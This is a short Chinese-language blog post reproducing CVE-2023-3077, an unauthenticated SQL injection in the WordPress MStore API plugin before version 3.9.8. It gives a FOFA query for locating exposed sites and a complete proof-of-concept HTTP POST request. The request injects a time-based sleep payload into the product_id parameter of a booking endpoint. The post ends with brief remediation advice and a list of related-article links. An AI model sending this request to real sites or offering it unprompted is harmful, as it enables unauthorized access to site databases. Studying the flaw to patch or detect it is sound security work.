WordPress plugin MStore API SQL注入漏洞复现(CVE-2023-3077)

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress plugin MStore API 3.9.8 版本之前存在SQL注入漏洞,该漏洞源于没有正确清理或转义某些字段,导致出现SQL注入,未经身份验证的远程攻击者可获取数据库敏感信息。

0x03 复现环境

FOFA:body="/wp-content/plugins/mstore-api/"

0x04 漏洞复现

PoC

复制代码
POST /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

延时6秒

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

将插件升级至安全版本

相关推荐
CNRio1 小时前
第8章 网络安全应急响应
网络·安全·web安全
漏洞文库-Web安全2 小时前
Linux逆向学习记录
linux·运维·学习·安全·web安全·网络安全·逆向
wanhengidc3 小时前
云手机 数字生活中新的可能
运维·服务器·科技·安全·智能手机·生活
浩浩测试一下4 小时前
C&&汇编中的调用约定
大数据·汇编·安全·web安全·网络安全·系统安全
-曾牛5 小时前
CSRF跨站请求伪造:原理、利用与防御全解析
前端·网络·web安全·网络安全·渗透测试·csrf·原理解析
黑客思维者6 小时前
IEEE 1547.3-2023与IEC62443标准异同分析
安全·系统安全·devsecops
渲吧-云渲染6 小时前
PDM部署革新:SaaS化转型与安全新挑战
安全·pdm
吳所畏惧7 小时前
少走弯路:uniapp里将h5链接打包为apk,并设置顶/底部安全区域自动填充显示,阻止webview默认全屏化
android·安全·uni-app·json·html5·webview·js
张3蜂7 小时前
CSRF Token:网络应用安全的关键防线——深度解析与实战指南
前端·安全·csrf
漏洞文库-Web安全7 小时前
CTFHub-RCE漏洞wp
android·安全·web安全·网络安全·ctf·ctfhub